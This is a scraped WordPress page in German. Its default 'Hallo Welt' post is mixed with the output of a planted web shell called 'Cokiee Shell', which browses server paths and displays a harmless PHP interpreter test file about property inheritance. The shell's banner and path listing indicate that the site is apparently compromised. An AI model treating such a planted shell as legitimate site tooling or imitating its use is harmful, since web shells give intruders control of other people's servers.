Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug29689.phpt |
--TEST-- Bug #29689 (default value of protected member overrides default value of private) --FILE-- <?php class foo { private $foo = 'foo'; private $foo2 = 'foo2'; function printFoo() { echo __CLASS__, ': ', $this->foo, " ", $this->foo2, "\n"; } } class bar extends foo { protected $foo = 'bar'; function printFoo() { parent::printFoo(); echo __CLASS__, ': ', $this->foo, " ", $this->foo2, "\n"; } } class baz extends bar { protected $foo = 'baz'; protected $foo2 = 'baz2'; } class bar2 extends foo { function printFoo() { parent::printFoo(); echo __CLASS__, ': ', $this->foo, " ", $this->foo2, "\n"; } } class baz2 extends bar2 { protected $foo = 'baz2'; protected $foo2 = 'baz22'; } $bar = new bar; $bar->printFoo(); echo "---baz--\n"; $baz = new baz(); $baz->printFoo(); echo "---baz2--\n"; $baz = new baz2(); $baz->printFoo(); ?> --EXPECTF-- foo: foo foo2 bar: bar Notice: Undefined property: bar::$foo2 in %s on line %d ---baz-- foo: foo foo2 bar: baz baz2 ---baz2-- foo: foo foo2 bar2: baz2 baz22
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare